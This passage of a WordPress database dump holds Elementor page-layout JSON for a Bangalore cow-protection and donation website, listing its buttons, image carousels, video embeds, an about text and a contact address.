Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\\n\\n\\n\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/adopt-donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Shop With Us\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11084,1843,'_elementor_page_assets','a:0:{}'),(11086,1844,'_elementor_edit_mode','builder'),(11087,1844,'_elementor_template_type','wp-page'),(11088,1844,'_elementor_version','3.7.8'),(11089,1844,'_wp_page_template','elementor_canvas'),(11090,1844,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\\n\\n\\n\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Shop With Us\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.